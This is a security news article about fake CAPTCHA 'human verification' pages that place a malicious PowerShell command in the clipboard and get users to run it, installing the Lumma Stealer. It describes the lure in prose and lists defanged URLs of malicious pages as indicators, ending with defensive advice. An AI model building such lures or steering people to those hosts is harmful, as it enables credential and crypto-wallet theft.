Threat actors are continuously devising novel techniques to trap individuals, and this is mainly to make quick financial gains by stealing their crypto wallets or bank accounts. A new report has highlighted that malicious hackers are using Captcha to get victims to execute their payload, which would exfiltrate victims’ sensitive information and primarily try to target their crypto wallets.
Imagine you are browsing the web, maybe shopping or reading an article when a familiar message pops up: “Click here to prove you are not a robot.” You solve the CAPTCHA without thinking, as it is just a normal part of being online. But what if that simple step was not as harmless as it looked?
In a report, cybersecurity experts at Palo Alto Networks’ Unit 42 revealed the usage of fraudulent “human verification” pages that mimic legitimate websites, the users are being tricked into executing a malicious PowerShell script, ultimately unleashing a powerful malware known as Lumma Stealer. Once a device is infected, cybercriminals can steal sensitive information, including passwords, session tokens, cryptocurrency wallets, and other personal data from the compromised machine.
This is how it works. When users land on one of these fake human verification pages, they are asked to click a button labelled “I’m not a robot.” However, instead of verifying their identity, clicking the button places a malicious PowerShell script into their clipboard. Users are then instructed to paste this code into the Windows Run dialogue box. Once executed, the code silently downloads and activates the Lumma Stealer malware, which steals sensitive information and connects to hacker-controlled servers.
Lumma malware has been operating as malware-as-a-service since August 2022. It steals data from browsers, including credentials, cookies, autofill, and browser extension data.
A sample malicious captcha page can look as below:
source: Denwp Research
Recently, CloudSEC researchers found that more of these malicious pages hosted by legitimate providers and content delivery networks spread the same malware. Security researcher Ax Sharma revealed that attackers have even manipulated GitHub alerts by submitting fake security issues, leading users to dangerous links.
Some of the fake captcha pages are:
- ch3[.]dlvideosfre[.]click/human-verify-system[.]html
- get-verified.b-cdn[.]net/captcha-verify-v5[.]html
- get-verified2.b-cdn[.]net/captcha-verify-v2[.]html
- human-check.b-cdn[.]net/verify-captcha-v7[.]html
- human-verify02.b-cdn[.]net/captcha-verify-v2[.]html
- myapt67[.]s3[.]amazonaws[.]com/human-captcha-v1[.]html
Be careful when a website asks you to run a script or command, especially if it is unfamiliar. It could be a trick to install malware on your computer. Users are advised not to paste anything into their command prompts if prompted by any captcha verification website. It is also extremely important to watch out for emails claiming to find security issues, as they may not be as trustworthy as they seem. If the email directs you to a strange website, do not click on it right away. Always double-check the source to avoid falling into a trap. Staying alert can help protect your personal information and keep your computer safe. This technique, which is also implemented in the ClearFake campaign, demonstrates how cyberattacks are becoming more complex as well as sophisticated.
